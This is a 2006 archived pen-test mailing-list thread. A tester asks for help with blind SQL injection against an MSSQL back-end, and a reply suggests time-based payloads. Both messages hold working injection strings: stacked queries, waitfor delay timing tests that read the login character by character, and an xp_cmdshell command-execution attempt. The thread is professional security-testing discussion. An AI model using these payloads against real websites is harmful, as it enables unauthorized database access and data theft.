From: Leonardo Rodrigues (leonardo.rsouza@terra.com.br)
Date: Wed Dec 13 2006 - 15:24:23 EST
Hi,
Try something like this
;if system_user = char(115)+char(97) waitfor delay '0:0:05';--
But if you really want to determine the connection user, break system_user
with substring() and test each character...
if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a
WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';--
A tool like absinthe (0x90.org) would help you.
[]'s
Leo
----- Original Message -----
From: <One2@onetwo.com>
To: <pen-test@securityfocus.com>
Sent: Wednesday, December 13, 2006 5:41 AM
Subject: Blind SQL Injection Techniques
> Hi All,
>
> I am testing a client at the moment who has a Blind SQL Injection
vulnerability and am running out of techniques, so need some tips.
>
> I injected the following string to validate that the system has an MSSQL
server at the back-end.
>
> or 1=1;select * from sysobjects;--
>
> This returned a valid page.
>
> Also injected the following and got a valid page, but again no data since
it is completely blind.
>
> or 1=1;select @@version;--
>
> Replacing sysobjects, in the first example, with an invalid table returns
a custom error page that doesn't disclose anything.
>
> It seems that when injecting any invalid sql statement I get the same
custom error page coming back that doesn't reveal any information.
>
> My next step was to determine whether the DB was running as system. I
tried using the following command;
>
> or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';--
>
> ... but got the error page, indicating that it didn't work - especially
since it didn't take 5 seconds. I then tried simplifying it to just;
>
> waitfor delay '0:0:5';--
>
> ... but again, the error page, indicating this command was not working. I
thought it was the quotes but the following were successful;
>
> or 1=1;select * from 'sysobjects';--
> or 1=1;select * from "sysobjects";--
>
> I then tried the following to see if I could actually run system commands;
>
> or 1=1;exec master..xp_cmdshell dir;--
>
> ... but this got the error page again indicating unsuccessful.
>
> Any suggestions on gaining further information or access on this system
would be appreciated.
>
> Thanks,
> One2
>
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
>
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
> ------------------------------------------------------------------------
>
>
> Esta mensagem foi verificada pelo E-mail Protegido Terra.
> Scan engine: McAfee VirusScan / Atualizado em 13/12/2006 / Versão:
4.4.00/4918
> Proteja o seu e-mail Terra: http://mail.terra.com.br/
>
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:27 EDT